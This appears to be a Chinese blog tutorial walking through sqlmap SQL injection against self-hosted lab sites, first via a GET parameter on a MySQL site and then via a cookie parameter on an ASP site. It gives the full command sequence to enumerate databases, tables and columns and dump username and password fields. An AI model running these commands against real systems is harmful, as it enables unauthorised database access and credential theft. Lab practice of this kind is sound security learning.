sqlmap cookie注入使用
之前了解了sqlmap的基本使用,注入的是一个Access的数据库(数据库名只能爆破猜解),今天我们在来练习一下MySql的数据库。
首先还是在win7上使用NPMserv来搭建目标网站,在kali里面使用sqlmap,这里询问探测到数据库可能是MySQL,是否需要继续试试其他的数据库类型,我们选no
这里提示到我们是级别1和风险1的检测,这里可以了解一下
–level 5: 探测等级 参数–level 5
指需要执行的测试等级,一共有5个等级(1~5),可不加level,默认是1.sqlmap使用的Payload可以在xml/payload.xml中 看到,也可以根据相应的格式添加自己的Payload,其中5级包含的Payload最多,会自动破解出cookie、XFF等头注入。当然,level5的运行速度也比较慢 。这个参数会影响测试的注入点,GET和POST的数据都会进行测试,HTTP cookie在level为2时就会测试,HTTP
User-Agent/Referer头在level为3时就会测试。总之,在不确定哪个Payload或参数为注入点时,为保证全面性,建议使用高得level值。原文链接:https://blog.csdn.net/zouchengzhi1021/article/details/104838355
可以看到是MySQL数据库,info_id是注入点,这里可以时间盲注、boolean盲注、union注入
和Access不一样,MySQL可以直接爆出数据库名,因为有元数据库information_schema:
sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --dbs
这里我们可以用 下面的current-db来检测出正在使用的数据库,是govcn
sqlmap -u “http://192.168.71.131/info_show.php?info_id=140”
–current-db
当前使用的用户,是root
sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --current-user
接下来就是查表了
sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --tables
-D “govcn”
接着再查admin表的columns
sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --columns
-T “admin” -D “govcn”
ok最后再查字段username和password
sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --dump -C
“username,password” -T “admin” -D “govcn”
什么是cookie
cookie用于在客户端本地保存用户访问网站时的一些身份验证信息。
比如说上qq邮箱,有个十天内免登录或者免登录选项,这就是利用cookie下次免密码验证来登录。
cookie与get和post方法一样,都可用于客户端向服务器端传递数据。
再用sqlmap感受一下cookie注入,搭建的网站是南方数据5.0,屏蔽掉了get和post的提交,用小旋风搭建,还是一样把文件解压放到AspWebServer目录的wwwroot下.可以看到 post提交的被屏蔽了.
这里问是否要对cookie进行url编码,我们选择是
sqlmap -u “192.168.71.131/shownews.asp” --cookie “id=25” --level 2
这里使用level 2 是因为sqlmap共有五个等级,默认为1。
级别1,探测GET和POST数据。
级别2,探测Cookie数据。
这里说cookie 参数的id是可以攻击的,问我们是否要检测其他注入点,选择no
直接爆一下表名
sqlmap -u “192.168.71.131/shownews.asp” --cookie “id=25” --level 2
–tables
直接成功爆出表名,这里user肯定是我们关注的
我们直接来跑一下字段,这里是用字典来爆破的,可以看到我们需要的字段就可以停止了
sqlmap -u “192.168.71.131/shownews.asp” --cookie “id=25” --level 2
–columns -T “user”
直接跑一下我们需要的数据
sqlmap -u “192.168.71.131/shownews.asp” --cookie “id=25” --level 2
–dump -C “userid,usename,password” -T “user”